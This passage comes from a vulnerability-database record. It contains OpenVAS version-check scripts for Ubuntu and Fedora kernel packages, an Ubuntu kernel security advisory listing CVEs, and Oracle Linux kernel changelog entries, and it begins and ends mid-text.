isdpkgvuln(pkg:\"linux-headers-2.6.27-17\", ver:\"2.6.27-17.45\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-source-2.6.27\", ver:\"2.6.27-17.45\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU8.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-27-386\", ver:\"2.6.24-27.65\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-27-generic\", ver:\"2.6.24-27.65\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-27-openvz\", ver:\"2.6.24-27.65\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-27-rt\", ver:\"2.6.24-27.65\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-27-server\", ver:\"2.6.24-27.65\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-27-virtual\", ver:\"2.6.24-27.65\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-27-xen\", ver:\"2.6.24-27.65\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-27-386\", ver:\"2.6.24-27.65\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-27-generic\", ver:\"2.6.24-27.65\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-27-server\", ver:\"2.6.24-27.65\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-27-virtual\", ver:\"2.6.24-27.65\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-debug-2.6.24-27-386\", ver:\"2.6.24-27.65\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-debug-2.6.24-27-generic\", ver:\"2.6.24-27.65\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-debug-2.6.24-27-server\", ver:\"2.6.24-27.65\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-debug-2.6.24-27-virtual\", ver:\"2.6.24-27.65\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-libc-dev\", ver:\"2.6.24-27.65\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-27-openvz\", ver:\"2.6.24-27.65\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-27-rt\", ver:\"2.6.24-27.65\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-27-xen\", ver:\"2.6.24-27.65\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-doc-2.6.24\", ver:\"2.6.24-27.65\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-27\", ver:\"2.6.24-27.65\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-kernel-devel\", ver:\"2.6.24-27.65\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-source-2.6.24\", ver:\"2.6.24-27.65\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU9.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.31-304-ec2\", ver:\"2.6.31-304.10\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.31-304-ec2\", ver:\"2.6.31-304.10\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.31-19-386\", ver:\"2.6.31-19.56\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.31-19-generic-pae\", ver:\"2.6.31-19.56\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.31-19-generic\", ver:\"2.6.31-19.56\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.31-19-386\", ver:\"2.6.31-19.56\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.31-19-generic-pae\", ver:\"2.6.31-19.56\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.31-19-generic\", ver:\"2.6.31-19.56\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.31-19-virtual\", ver:\"2.6.31-19.56\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-libc-dev\", ver:\"2.6.31-19.56\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-ec2-doc\", ver:\"2.6.31-304.10\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-ec2-source-2.6.31\", ver:\"2.6.31-304.10\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.31-304\", ver:\"2.6.31-304.10\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-doc\", ver:\"2.6.31-19.56\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.31-19\", ver:\"2.6.31-19.56\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-source-2.6.31\", ver:\"2.6.31-19.56\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-22T13:05:31", "bulletinFamily": "scanner", "description": "Check for the Version of kernel", "modified": "2018-01-22T00:00:00", "published": "2010-03-02T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310861615", "id": "OPENVAS:1361412562310861615", "title": "Fedora Update for kernel FEDORA-2010-1500", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for kernel FEDORA-2010-1500\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"kernel on Fedora 11\";\ntag_insight = \"The kernel package contains the Linux kernel (vmlinuz), the core of any\n Linux operating system. The kernel handles the basic functions\n of the operating system: memory allocation, process allocation, device\n input and output, etc.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2010-February/034830.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.861615\");\n script_version(\"$Revision: 8485 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-22 08:57:57 +0100 (Mon, 22 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-03-02 08:38:02 +0100 (Tue, 02 Mar 2010)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2010-1500\");\n script_cve_id(\"CVE-2009-4141\", \"CVE-2009-4536\", \"CVE-2009-4537\", \"CVE-2009-4538\", \"CVE-2010-0307\", \"CVE-2010-0003\", \"CVE-2010-0007\", \"CVE-2010-0006\", \"CVE-2009-3547\", \"CVE-2009-3638\", \"CVE-2009-3624\", \"CVE-2009-3621\", \"CVE-2009-3620\", \"CVE-2009-3612\", \"CVE-2009-2909\", \"CVE-2009-2908\", \"CVE-2009-2903\", \"CVE-2009-3290\", \"CVE-2009-2847\");\n script_name(\"Fedora Update for kernel FEDORA-2010-1500\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC11\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.30.10~105.2.13.fc11\", rls:\"FC11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "ubuntu": [{"lastseen": "2019-05-29T17:22:25", "bulletinFamily": "unix", "description": "Amerigo Wang and Eric Sesterhenn discovered that the HFS and ext4 filesystems did not correctly check certain disk structures. If a user were tricked into mounting a specially crafted filesystem, a remote attacker could crash the system or gain root privileges. (CVE-2009-4020, CVE-2009-4308)\n\nIt was discovered that FUSE did not correctly check certain requests. A local attacker with access to FUSE mounts could exploit this to crash the system or possibly gain root privileges. Ubuntu 9.10 was not affected. (CVE-2009-4021)\n\nIt was discovered that KVM did not correctly decode certain guest instructions. A local attacker in a guest could exploit this to trigger high scheduling latency in the host, leading to a denial of service. Ubuntu 6.06 was not affected. (CVE-2009-4031)\n\nIt was discovered that the OHCI fireware driver did not correctly handle certain ioctls. A local attacker could exploit this to crash the system, or possibly gain root privileges. Ubuntu 6.06 was not affected. (CVE-2009-4138)\n\nTavis Ormandy discovered that the kernel did not correctly handle O_ASYNC on locked files. A local attacker could exploit this to gain root privileges. Only Ubuntu 9.04 and 9.10 were affected. (CVE-2009-4141)\n\nNeil Horman and Eugene Teo discovered that the e1000 and e1000e network drivers did not correctly check the size of Ethernet frames. An attacker on the local network could send specially crafted traffic to bypass packet filters, crash the system, or possibly gain root privileges. (CVE-2009-4536, CVE-2009-4538)\n\nIt was discovered that \u201cprint-fatal-signals\u201d reporting could show arbitrary kernel memory contents. A local attacker could exploit this, leading to a loss of privacy. By default this is disabled in Ubuntu and did not affect Ubuntu 6.06. (CVE-2010-0003)\n\nOlli Jarva and Tuomo Untinen discovered that IPv6 did not correctly handle jumbo frames. A remote attacker could exploit this to crash the system, leading to a denial of service. Only Ubuntu 9.04 and 9.10 were affected. (CVE-2010-0006)\n\nFlorian Westphal discovered that bridging netfilter rules could be modified by unprivileged users. A local attacker could disrupt network traffic, leading to a denial of service. (CVE-2010-0007)\n\nAl Viro discovered that certain mremap operations could leak kernel memory. A local attacker could exploit this to consume all available memory, leading to a denial of service. (CVE-2010-0291)", "modified": "2010-02-05T00:00:00", "published": "2010-02-05T00:00:00", "id": "USN-894-1", "href": "https://usn.ubuntu.com/894-1/", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:38:20", "bulletinFamily": "unix", "description": "[2.6.18-164.11.1.0.1.el5]\n- [xen] check to see if hypervisor supports memory reservation change\n (Chuck Anderson) [orabug 7556514]\n- Add entropy support to igb ( John Sobecki) [orabug 7607479]\n- [nfs] convert ENETUNREACH to ENOTCONN [orabug 7689332]\n- [NET] Add xen pv/bonding netconsole support (Tina yang) [orabug 6993043]\n [bz 7258]\n- [MM] shrink zone patch (John Sobecki,Chris Mason) [orabug 6086839]\n- fix aacraid not to reset during kexec (Joe Jin) [orabug 8516042]\n- [nfsd] fix failure of file creation from hpux client (Wen gang Wang)\n [orabug 7579314]\n- FP register state is corrupted during the handling a SIGSEGV (Chuck Anderson)\n [orabug 7708133]\n[2.6.18-164.11.1.el5]\n- [firewire] ohci: handle receive packets with zero data (Jay Fenlason) [547241 547242] {CVE-2009-4138}\n- [x86] sanity check for AMD northbridges (Andrew Jones) [549905 547518]\n- [x86_64] disable vsyscall in kvm guests (Glauber Costa) [550968 542612]\n- [fs] ext3: replace lock_super with explicit resize lock (Eric Sandeen) [549908 525100]\n- [fs] respect flag in do_coredump (Danny Feng) [544188 544189] {CVE-2009-4036}\n- [gfs2] make O_APPEND behave as expected (Steven Whitehouse) [547521 544342]\n- [fs] hfs: fix a potential buffer overflow (Amerigo Wang) [540740 540741] {CVE-2009-4020}\n- [fuse] prevent fuse_put_request on invalid pointer (Danny Feng) [538736 538737] {CVE-2009-4021}\n- [mm] call vfs_check_frozen after unlocking the spinlock (Amerigo Wang) [548370 541956]\n- [infiniband] init neigh->dgid.raw on bonding events (Doug Ledford) [543448 538067]\n- [scsi] gdth: prevent negative offsets in ioctl (Amerigo Wang) [539420 539421] {CVE-2009-3080}\n- [fs] gfs2: fix glock ref count issues (Steven Whitehouse) [544978 539240]\n- [net] call cond_resched in rt_run_flush (Amerigo Wang) [547530 517588]\n- [scsi] megaraid: fix sas permissions in sysfs (Casey Dahlin) [537312 537313] {CVE-2009-3889 CVE-2009-3939}\n- [ia64] kdump: restore registers in the stack on init (Takao Indoh ) [542582 515753]\n- [x86] kvm: don't ask HV for tsc khz if not using kvmclock (Glauber Costa ) [537027 531268]\n- [net] sched: fix panic in bnx2_poll_work (John Feeney ) [539686 526481]\n- [x86_64] fix 32-bit process register leak (Amerigo Wang ) [526797 526798]\n- [cpufreq] add option to avoid smi while calibrating (Matthew Garrett ) [537343 513649]\n- [kvm] use upstream kvm_get_tsc_khz (Glauber Costa ) [540896 531025]\n- [net] fix unbalance rtnl locking in rt_secret_reschedule (Neil Horman ) [549907 510067]\n- [net] r8169: imporved rx length check errors (Neil Horman ) [552913 552438]\n- [scsi] lpfc: fix FC ports offlined during target controller faults (Rob Evers ) [549906 516541]\n- [net] emergency route cache flushing fixes (Thomas Graf ) [545662 545663] {CVE-2009-4272}\n- [fs] fasync: split 'fasync_helper()' into separate add/remove functions (Danny Feng ) [548656 548657] {CVE-2009-4141}\n- [scsi] qla2xxx: NPIV vport management pseudofiles are world writable (Tom Coughlan ) [537317 537318] {CVE-2009-3556}", "modified": "2010-01-20T00:00:00", "published": "2010-01-20T00:00:00", "id": "ELSA-2010-0046", "href": "http://linux.oracle.com/errata/ELSA-2010-0046.html", "title": "kernel security and bug fix update", "type": "oraclelinux", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:36:27", "bulletinFamily": "unix", "description": " [2.6.18-194.el5]\n- [net] mlx4: pass attributes down to vlan interfaces (Doug Ledford) [573098]\n- [block] cfq-iosched: fix sequential read perf regression (Jeff Moyer) [571818]\n[2.6.18-193.el5]\n- [fs] gfs2: locking fix for potential dos (Steven Whitehouse) [572390] {CVE-2010-0727}\n- [acpi] power_meter: avoid oops on driver load (Matthew Garrett) [566575]\n- [net] r8169: fix assignments in backported net_device_ops (Ivan Vecera) [568040]\n- [net] virtio_net: refill rx buffer on out-of-memory (Herbert Xu) [554078]\n[2.6.18-192.el5]\n- [cpu] fix amd l3 cache disable functionality (Jarod Wilson) [517586]\n- [misc] backport upstream strict_strto* functions (Jarod Wilson) [517586]\n- [wireless] rt2x00: fix work cancel race conditions (Stanislaw Gruszka) [562972]\n- [net] igb: fix DCA support for 82580 NICs (Stefan Assmann) [513712]\n- Revert: [ia64] kdump: fix a deadlock while redezvousing (Neil Horman) [506694]\n- [block] cfq: kick busy queues w/o waiting for merged req (Jeff Moyer) [570814]\n- [fs] cifs: max username len check in setup does not match (Jeff Layton) [562947]\n- [fs] cifs: CIFS shouldnt make mountpoints shrinkable (Jeff Layton) [562947]\n- [fs] cifs: fix dentry hash for case-insensitive mounts (Jeff Layton) [562947]\n- [fs] cifs: fix len for converted unicode readdir names (Jeff Layton) [562947]\n- [x86_64] xen: fix missing 32-bit syscalls on 64-bit Xen (Christopher Lalancette) [559410]\n- [fs] gfs2: fix kernel BUG when using fiemap (Abhijith Das) [569610]\n- [net] sctp: backport cleanups for ootb handling (Neil Horman) [555667] {CVE-2010-0008}\n- [xen] vtd: ignore unknown DMAR entries (Don Dugger) [563900]\n[2.6.18-191.el5]\n- [wireless] iwlwifi: fix dual band N-only use on 5x00 (Stanislaw Gruszka) [566696]\n- [net] be2net: critical bugfix from upstream (Ivan Vecera) [567718]\n- [net] tg3: fix 5717 and 57765 asic revs panic under load (John Feeney) [565964]\n- [net] bnx2x: use single tx queue (Stanislaw Gruszka) [567979]\n- [net] igb: fix WoL initialization when disabled in eeprom (Stefan Assmann) [564102]\n- [net] igb: fix warning in igb_ethtool.c (Stefan Assmann) [561076]\n- [net] s2io: restore ability to tx/rx vlan traffic (Neil Horman) [562732]\n- [net] ixgbe: stop unmapping DMA buffers too early (Andy Gospodarek) [568153]\n- [net] e1000e: disable NFS filtering capabilites in ICH hw (Andy Gospodarek) [558809]\n- [net] bnx2: update firmware and version to 2.0.8 (Andy Gospodarek) [561578]\n- [net] mlx4: fix broken SRIOV code (Doug Ledford) [567730]\n- [net] mlx4: pass eth attributes down to vlan interfaces (Doug Ledford) [557109]\n- [x86_64] fix missing 32 bit syscalls on 64 bit (Wade Mealing) [559410]\n- [s390] zcrypt: Do not remove coprocessor on error 8/72 (Hendrik Brueckner) [561067]\n- [misc] usb-serial: add support for Qualcomm modems (Pete Zaitcev) [523888]\n- [scsi] mpt2sas: fix missing initialization (Tomas Henzl) [565637]\n- [i386] mce: avoid deadlocks during MCE broadcasts (Prarit Bhargava) [562862]\n- [x86_64] k8: do not mark early_is_k8_nb as __init (Paolo Bonzini) [567275]\n- [ia64] kdump: fix a deadlock while redezvousing (Neil Horman) [506694]\n- [dm] raid45: constructor error path oops fix (Heinz Mauelshagen) [565494]\n- [mm] prevent severe performance degradation hang fix (Dave Anderson) [544448]\n- [net] cxgb3: memory barrier addition fixup (Steve Best) [561957]\n[2.6.18-190.el5]\n- [x86_64] mce: avoid deadlocks during MCE broadcasts (Prarit Bhargava) [562866]\n- [scsi] device_handler: add netapp to alua dev list (Mike Christie) [562080]\n- [misc] wacom: add Intuos4 support (Don Zickus) [502708]\n- [scsi] be2iscsi: fix eh bugs and enable new hw support (Mike Christie) [564145]\n- [net] ixgbe: initial support of ixgbe PF and VF drivers (Andy Gospodarek) [525577]\n- [fs] ext4: avoid divide by 0 when mounting corrupted fs (Eric Sandeen) [547253]\n- [net] bnx2x: update to 1.52.1-6 firmware (Stanislaw Gruszka) [560556]\n- [net] bnx2x: update to 1.52.1-6 (Stanislaw Gruszka) [560556]\n- [misc] hvc_iucv: alloc send/receive buffers in DMA zone (Hendrik Brueckner) [566202]\n- [net] ixgbe: prevent speculatively processing descriptors (Steve Best) [566309]\n- [fs] fix randasys crashes x86_64 systems regression (Peter Bogdanovic) [562857]\n- [scsi] fix bugs in fnic and libfc (Mike Christie) [565594]\n- [net] tg3: fix 57765 LED (John Feeney) [566016]\n- [net] tg3: fix race condition with 57765 devices (John Feeney) [565965]\n- [fs] gfs2: use correct GFP for alloc page on write (Steven Whitehouse) [566221]\n- [scsi] lpfc: update version for 8.2.0.63.3p release (Rob Evers) [564506]\n- [scsi] lpfc: fix driver build issues in rhel5.5 (Rob Evers) [564506]\n- [scsi] lpfc: relax event queue field checking (Rob Evers) [564506]\n- [scsi] lpfc: implement the PORT_CAPABITIES mailbox cmd (Rob Evers) [564506]\n- [scsi] lpfc: fix a merge issue (Rob Evers) [564506]\n- [scsi] lpfc: Add support for new SLI features (Rob Evers) [564506]\n- [scsi] lpfc: Add support for 64-bit PCI BAR region 0 (Rob Evers) [564506]\n- [nfs] fix a deadlock in the sunrpc code (Steve Dickson) [548846]\n- [fs] ecryptfs: fix metadata in xattr feature regression (Eric Sandeen) [553670]\n- [scsi] qla2xxx: return FAILED if abort command fails (Rob Evers) [559972]\n- [virtio] fix module loading for virtio-balloon module (Anthony Liguori) [564361]\n- [mm] xen: make mmap() with PROT_WRITE (Andrew Jones) [562761]\n- [hwmon] w83627hf: fix data to platform_device_add_data (Dean Nelson) [557172]\n- [hwmon] smsc47m1: fix data to platform_device_add_data (Dean Nelson) [560944]\n- [hwmon] it87: fix sio_data to platform_device_add_data (Dean Nelson) [559950]\n- [hwmon] f71805f: fix sio_data to platform_device_add_data (Dean Nelson) [564399]\n- [base] make platform_device_add_data accept const pointer (Dean Nelson) [557172 559950 560944 564399]\n- [net] forcedeth: fix putting system into S4 (Matthew Garrett) [513203]\n- [net] netfilter: allow changing queue length via netlink (Steve Best) [562945]\n- [mm] i386: fix iounmaps use of vm_structs size field (Danny Feng) [549465]\n- [ppc] fix sched while atomic error in alignment handler (Steve Best) [543637]\n- [pci] aer: disable advanced error reporting by default (Prarit Bhargava) [559978]\n- [s390] qeth: set default BLKT settings by OSA hw level (Hendrik Brueckner) [559621]\n- [net] e1000e: fix deadlock unloading module on some ICH8 (Andy Gospodarek) [555818]\n- [misc] rwsem: fix a bug in rwsem_is_locked() (Amerigo Wang) [526092]\n- [s390] clear high-order bits after switch to 64-bit mode (Hendrik Brueckner) [546302]\n[2.6.18-189.el5]\n- [net] wireless fixes from 2.6.32.7 (John Linville) [559711]\n- [net] wireless fixes from 2.6.32.4 (John Linville) [559711]\n- [net] wireless fixes through 2.6.32.3 (John Linville) [559711]\n- [net] wireless fixes from 2.6.32.2 (John Linville) [559711]\n[2.6.18-188.el5]\n- [net] be2net: latest bugfixes from upstream for rhel5.5 (Ivan Vecera) [561322]\n- [infiniband] fix bitmask handling from QP control block (Steve Best) [561953]\n- [infiniband] fix issue w/sleep in interrupt ehca handler (Steve Best) [561952]\n- [char] ipmi: fix ipmi_watchdog deadlock (Tony Camuso) [552675]\n- [net] cnic: additional fixes for rhel5.5 update (Mike Christie) [517378]\n- [net] cxgb3: add memory barriers (Steve Best) [561957]\n- [fs] nfsv4: distinguish expired from stale stateid (Wade Mealing) [514654]\n- [net] igb: fix msix_other interrupt masking (Stefan Assmann) [552348]\n- [net] niu: fix deadlock when using bonding (Andy Gospodarek) [547943]\n- [x86] xen: invalidate dom0 pages before starting guest (Christopher Lalancette) [466681]\n- [cpufreq] powernow-k8: fix crash on AMD family 0x11 procs (Bhavna Sarathy) [555180]\n- [misc] ptrace: PTRACE_KILL hangs in 100% cpu loop (Vitaly Mayatskikh) [544138]\n- [scsi] megaraid: fix 32-bit apps on 64-bit kernel (Tomas Henzl) [518243]\n- [misc] fix APIC and TSC reads for guests (Prarit Bhargava) [562006]\n- [mm] fix sys_move_pages infoleak (Eugene Teo) [562590] {CVE-2010-0415}\n- [fs] aio: fix .5% OLTP perf regression from eventfd (Jeff Moyer) [548565]\n- [net] sky2: fix initial link state errors (Andy Gospodarek) [559329]\n- [x86_64] wire up compat sched_rr_get_interval (Danny Feng) [557092]\n- [net] netfilter: enforce CAP_NET_ADMIN in ebtables (Danny Feng) [555243] {CVE-2010-0007}\n- [misc] fix kernel info leak with print-fatal-signals=1 (Danny Feng) [554584] {CVE-2010-0003}\n- [fs] gfs2: dont withdraw on partial rindex entries (Benjamin Marzinski) [553447]\n- [net] ipv6: fix OOPS in ip6_dst_lookup_tail (Thomas Graf) [552354]\n- [misc] khungtaskd: set PF_NOFREEZE flag to fix suspend (Amerigo Wang) [550014]\n- [block] loop: fix aops check for GFS (Josef Bacik) [549397]\n[2.6.18-187.el5]\n- [misc] EDAC driver fix for non-MMCONFIG systems (Bhavna Sarathy) [550123]\n- [misc] audit: fix breakage and leaks in audit_tree.c (Alexander Viro) [549750]\n- [mm] prevent hangs during memory reclaim on large systems (Larry Woodman) [546428]\n- [usb] support more Huawei modems (Pete Zaitcev) [517454]\n- [x86] fix AMD M-C boot inside xen on pre-5.5 hypervisor (Paolo Bonzini) [560013]\n- [kvm] pvclock on i386 suffers from double registering (Glauber Costa) [557095]\n- [md] fix kernel panic releasing bio after recovery failed (Takahiro Yasui) [555171]\n- [md] fix deadlock at suspending mirror device (Takahiro Yasui) [555120]\n- [pci] VF cant be enabled in dom0 (Don Dutile) [547980]\n- [acpi] fix NULL pointer panic in acpi_run_os (Prarit Bhargava) [547733]\n- [kvm] kvmclock wont restore properly after resume (Glauber Costa) [539521]\n- [x86_64] export additional features in cpuinfo for xen (Prarit Bhargava) [517928]\n- [fs] proc: make smaps readable even after setuid (Dave Anderson) [322881]\n- [net] iptables: fix routing of REJECT target packets (Jiri Olsa) [548079]\n- [net] niu: fix the driver to be functional with vlans (Jiri Pirko) [538649]\n- [mm] prevent performance hit for 32-bit apps on x86_64 (Larry Woodman) [544448]\n- [mm] mmap: dont ENOMEM when mapcount is temp exceeded (Danny Feng) [552648]\n- [fs] proc: make errno values consistent when race occurs (Danny Feng) [556545]\n- [net] igb: update driver to support End Point DCA (Stefan Assmann) [513712]\n- [scsi] qla2xxx: FCP2 update, dpc bug, fast mailbox read (Rob Evers) [550286]\n- [scsi] qla2xxx: fix timeout value for CT passthru cmds (Rob Evers) [552327]\n- [scsi] lpfc: update to version 8.2.0.63.p2 (Rob Evers) [557792]\n- [scsi] lpfc: update driver to version 8.2.0.63.1p FC/FCoE (Rob Evers) [555604]\n- [scsi] be2iscsi: upstream driver refresh for rhel5.5 (Mike Christie) [554545]\n- [pci] add ids for intel b43 graphics controller (John Villalovos) [523637]\n- [misc] support Nehalem-EX processors in Oprofile (John Villalovos) [521992]\n- [scsi] scsi_dh: make rdac hw handlers activate() async (Rob Evers) [537514]\n- [scsi] scsi_dh: change scsidh_activate interface to async (Rob Evers) [537514]\n- [alsa] support Creative X-Fi EMU20K1 and EMU20K2 chips (Jaroslav Kysela) [523786]\n- [net] tg3: update to version 3.106 for 57765 asic support (John Feeney) [545135]\n- [net] bonding: fix alb mode locking regression (Andy Gospodarek) [533496]\n- [scsi] stex: dont try to scan a nonexistent lun (David 